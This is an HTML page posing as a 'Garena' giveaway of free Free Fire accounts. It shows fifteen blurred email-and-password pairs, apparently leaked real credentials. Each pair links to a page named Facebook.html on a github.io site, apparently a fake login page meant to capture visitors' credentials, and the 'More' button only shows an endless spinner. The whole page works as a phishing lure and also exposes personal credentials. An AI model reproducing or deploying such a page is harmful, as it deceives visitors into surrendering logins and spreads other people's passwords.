<!DOCTYPE HTML>
<html>
<head>
<title>Garena</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="keywords" content="NETFLIX, FREE ACCOUNTS, PREMIUM, CRACKED, HACKED">
<meta name="description" content="Collect your free Freefire accounts">
<meta name="author" content="Skipidin">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.0/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<link href="https://fonts.googleapis.com/css2?family=Cormorant+Garamond:wght@700&display=swap" rel="stylesheet">
<style>
*{
	padding: 0;
  box-sizing: border-box;
  margin: auto;
  font-famly: 'Cormorant Garamond', serif;
}
body{
	background: #fff;
	font-size: 3vw;
	height: auto;
	color: #fff;
font-weight: 100;
font-size: 10px;
}
a{
text-decoration: none;
color: #fff;
font-weight: 900;
}
#hodyh1{
	font-weight: 700;
font-size: 5.5vw;
padding: 0;
}
#hodyh2{
font-weight: 700;
font-size: 4.7vw;
color: #DE8D00;
padding: 0;
margin: 0 0 0 32vw;
}
h1{
		color: #1777ff;
		font-weiht: bold;
}
*{
font-weight: 100;
font-size: 5vw;
}
body{
	font-sie: 4.5vw;
}
#hody{
	background: #090907;
color: #E50914;
	position: fixed;
	padding: 5vw;
	width: 100%;
z-index: 100;
box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
font-weight: 100;
margin: -28vw 0 0 0;
text-align: left;
}
#srrk{
margin: 28vw 15px -65px 15px;
background: url("https://wallpaperaccess.com/download/france-flag-397853");
background-size: 100% 100%;
color: #221F1F;
padding: 7px;
border-radius: 6px;
box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
}
#srrs{
margin: 100px 15px -65px 15px;
background: url("https://wallpaperaccess.com/download/sweden-flag-1203939");
background-size: 100% 100%;
color: #221F1F;
padding: 7px;
box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
border-radius: 6px;
}
#srrf{
margin: 100px 15px -65px 15px;
background: url("https://wallpaperaccess.com/download/usa-american-flag-desktop-131326");
background-size: 100% 100%;
color: #221F1F;
padding: 7px;
box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
border-radius: 6px;
}
#srrm{
margin: 100px 15px -65px 15px;
background: url("https://wallpaperaccess.com/download/morocco-flag-3840660");
background-size: 100% 100%;
color: #221F1F;
padding: 7px;
box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
border-radius: 6px;
}
#srrw{
margin: 100px 15px -65px 15px;
background: url("https://wallpaperaccess.com/download/united-kingdom-flag-96007");
background-size: 100% 100%;
color: #221F1F;
padding: 7px;
box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
border-radius: 6px;
}
h3{
background: #fff;
padding: 6px;
border-radius: 0px;
margin: -10px 0 10px 0;
color: #000;
}
b{
font-weight: 900;
color: #E50914;
}
img{
position: relative;
height: 20vw;
width: 20vw;
padding: 0;
margin: 15vw 0 -25vw 35vw;
z-index: 3;
visibility: visible;
}
.lds-ellipsis {
  display: inline-block;
  position: relative;
  width: 80px;
  height: 80px;
}
.lds-ellipsis div {
  position: absolute;
  top: 33px;
  width: 3.5vw;
  height: 3.5vw;
  border-radius: 50%;
  background: #DE8D00;
  animation-timing-function: cubic-bezier(0, 1, 1, 0);
}
.lds-ellipsis div:nth-child(1) {
  left: 8px;
  animation: lds-ellipsis1 0.6s infinite;
}
.lds-ellipsis div:nth-child(2) {
  left: 8px;
  animation: lds-ellipsis2 0.6s infinite;
}
.lds-ellipsis div:nth-child(3) {
  left: 32px;
  animation: lds-ellipsis2 0.6s infinite;
}
.lds-ellipsis div:nth-child(4) {
  left: 56px;
  animation: lds-ellipsis3 0.6s infinite;
}
@keyframes lds-ellipsis1 {
  0% {
    transform: scale(0);
  }
  100% {
    transform: scale(1);
  }
}
@keyframes lds-ellipsis3 {
  0% {
    transform: scale(1);
  }
  100% {
    transform: scale(0);
  }
}
@keyframes lds-ellipsis2 {
  0% {
    transform: translate(0, 0);
  }
  100% {
    transform: translate(24px, 0);
  }
}
#infi{
visibility: hidden;
margin: -18vw 0 0 39.5vw;
}
#would button{
height: 15vw;
width: 30vw;
background: transparent;
border: 3px #DE8D00 solid;;
border-radius: 3vw;
text-align: center;
padding: 0;
color: #DE8D00;
margin: 0 0 0 35vw;
font-weight: 900;
box-shadow: 0px 8px 16px 0px rgba(0,0,0,0.2);
}
hr{
transform: rotate(90deg);
width: 10%;
margin: -5vw 0 -3.5vw 25vw;
padding: 0;
background: #EBB014;
border: 1px solid #EBB014;
}
#hody img{
height: 18vw;
width: 28vw;
margin: -6vw -2vw -4vw -1vw;
padding: 0;
}
</style>
</head>
<body id="dm">
<div id="hody">
<img src="https://wallpaperaccess.com/download/free-fire-movie-1248888"/>
<hr>
<h id="hodyh2"><b>GARENA COMPTES</b></h>
</div>
<div id="srrk">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 id="h3" style="border-radius: 8px 8px 0 0; filter: blur(1vw);"><b>Gmail:</b> frasernicol@hotmail.co.uk</h3>
<h3 id="h33" style="filter: blur(1vw);"><b>Password:</b> v6ajova</h3>
<h3 id="h333" style="border-radius: 0 0 8px 8px; filter: blur(1vw);"><b>Country:</b> UK</h3>
</a>
</div>
<div id="srrk">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> imogen705@hotmail.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> imogen</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> UK</h3>
</a>
</div>
<div id="srrk">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> Chrismurray@hotmail.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> jonny1080</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> UK</h3>
</a>
</div>
<div id="srrs">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> lil_miss_hawaii@hotmail.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> converse1</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> USA</h3>
</a>
</div>
<div id="srrs">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> ubk@hotmail.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> prin1cess</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> USA</h3>
</a>
</div>
<div id="srrs">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> hardstoneman@yahoo.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> the1dude</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> USA</h3>
</a>
</div>
<div id="srrf">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> arcalig@gmail.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> jonny1080</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> FR</h3>
</a>
</div>
<div id="srrf">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b>waytoocool@subzero-creative.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> michela</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> FR</h3>
</a>
</div>
<div id="srrf">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> d.martino@live.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> catania</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> FR</h3>
</a>
</div>
<div id="srrm">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> hhhoku@co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> hhoku123</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> MA</h3>
</a>
</div>
<div id="srrm">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0; filter: blur(1vw);"><b>Gmail:</b> chunhow_chua@yahoo.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> iloverac</h3>
<h3 style="border-radius: 0 0 8px 8px; filter: blur(1vw);"><b>Country:</b> MA</h3>
</a>
</div>
<div id="srrm">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> djrobbie2010@hotmail.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> password2</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> MA</h3>
</a>
</div>
<div id="srrw">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> woo_wendie@yahoo.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> mialara</h3>
<h3 style="border-radius: 0 0 8px 8px; filter: blur(1vw);"><b>Country:</b> SWE</h3>
</a>
</div>
<div id="srrw">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0;filter: blur(1vw);"><b>Gmail:</b> janetrichards16@hotmail.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> playboy1</h3>
<h3 style="border-radius: 0 0 8px 8px; filter: blur(1vw);"><b>Country:</b> SWE</h3>
</a>
</div>
<div id="srrw" style="margin-bottom: 35px;">
<a href="https://blacksmith779.github.io/pages/Facebook.html"><img id="img15" src="https://img.icons8.com/ios-filled/50/000000/security-shield-green.png">
<h3 style="border-radius: 8px 8px 0 0; filter: blur(1vw);"><b>Gmail:</b> symon5@hotmail.co.uk</h3>
<h3 style="filter: blur(1vw);"><b>Password:</b> rose94</h3>
<h3 style="border-radius: 0 0 8px 8px;filter: blur(1vw);"><b>Country:</b> SWE</h3>
</a>
</div>
<div id="would">
<button onclick="infinite()">More</button>
</div>
<div id="infi">
<div class="lds-ellipsis">
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
</div>
</div>
<script>
function got(){
var nn = document.getElementById("infi");
var we = document.getElementById("would");
nn.style.visibility = "visible";
we.style.visibility = "hidden";
}
function infinite(){
setInterval(got, 500);
}
</script>
</body>
</html
